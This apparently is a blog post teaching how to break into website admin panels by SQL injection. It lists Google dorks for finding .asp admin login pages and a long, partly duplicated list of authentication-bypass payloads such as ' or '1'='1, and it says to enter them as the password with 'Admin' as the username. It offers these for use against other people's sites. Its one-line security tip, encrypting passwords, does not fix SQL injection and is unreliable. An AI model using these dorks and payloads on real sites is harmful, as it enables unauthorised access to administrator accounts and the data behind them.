Hack Website Using SQL Injection
A injecting sql queries into another database or
using queries to get authentication bypass as an admin.
Part 1 : Basic sql injection
Gaining authentication bypass on an admin account.Most sites vulnerable to this are .asp,So first we need 2 find a site, start by opening Google.Now we type our dork: “definition of dork” ‘a search entry for a certain type of site/exploit ”
There is a large number of google dork for basic sql injection.
here is the best:
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
Now what to do once we get to our site.
the site should look something like this :
the site should look something like this :
Welcome to xxxxxxxxxx administrator panel
Username :
Password:
Username :
Password:
So what we do here is in the username we always type “Admin”
and for our password we type are sql injection.
and for our password we type are sql injection.
Here is a list of sql injections..
‘ or ’1′=’1
‘ or ‘x’=’x
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
‘or’1=1′
‘ or ‘x’=’x
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
‘or’1=1′
TYPE ANY ONE OF THESE IN PASSWORD SPACE…
There are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the database till it gives you authentication bypass.
So your input should look like this
There are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the database till it gives you authentication bypass.
So your input should look like this
username:Admin
password:’or’1′=’1
password:’or’1′=’1
So click submit and you’r in
NOTE not all sites are vulnerable.
NOTE not all sites are vulnerable.
HOW TO SECURE YOUR SITE FROM THIS ATTACK-
1- Put encryption on the passwords.
No comments:
Post a Comment